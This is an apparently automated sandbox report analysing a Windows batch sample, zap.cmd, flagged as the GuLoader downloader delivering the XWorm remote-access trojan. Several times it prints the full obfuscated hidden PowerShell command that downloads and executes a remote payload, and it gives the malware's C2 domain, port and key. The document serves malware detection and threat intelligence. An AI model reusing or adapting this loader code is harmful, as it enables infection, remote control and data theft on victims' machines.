Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zap.cmd

Overview

General Information

Sample name:zap.cmd
Analysis ID:1446779
MD5:0b65dcbdc755a516181f47d69f5aee10
SHA1:fc9319ec254c2be1b7ba5174d36d142c1ce20440
SHA256:00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43
Tags:cmd
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7488 cmdline: powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7672 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7744 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7828 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["xgmn934.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000005.00000002.2188569981.0000000008BF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000005.00000002.2181785367.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2189165327.000000000A036000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7488.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7744.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe0a0:$b2: ::FromBase64String(
              • 0xd179:$s1: -join
              • 0x6925:$s4: +=
              • 0x69e7:$s4: +=
              • 0xac0e:$s4: +=
              • 0xcd2b:$s4: +=
              • 0xd015:$s4: +=
              • 0xd15b:$s4: +=
              • 0x16e2d:$s4: +=
              • 0x16ead:$s4: +=
              • 0x16f73:$s4: +=
              • 0x16ff3:$s4: +=
              • 0x171c9:$s4: +=
              • 0x1724d:$s4: +=
              • 0xd944:$e4: Get-WmiObject
              • 0xdb33:$e4: Get-Process
              • 0xdb8b:$e4: Start-Process
              • 0x15938:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skri

              Snort Signatures

              Timestamp:05/23/24-21:07:05.956515
              SID:2852874
              Source Port:8896
              Destination Port:49741
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:06:27.424847
              SID:2855924
              Source Port:49741
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:07:17.694580
              SID:2852870
              Source Port:8896
              Destination Port:49741
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Found malware configuration
              Source: 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["xgmn934.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbSt source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
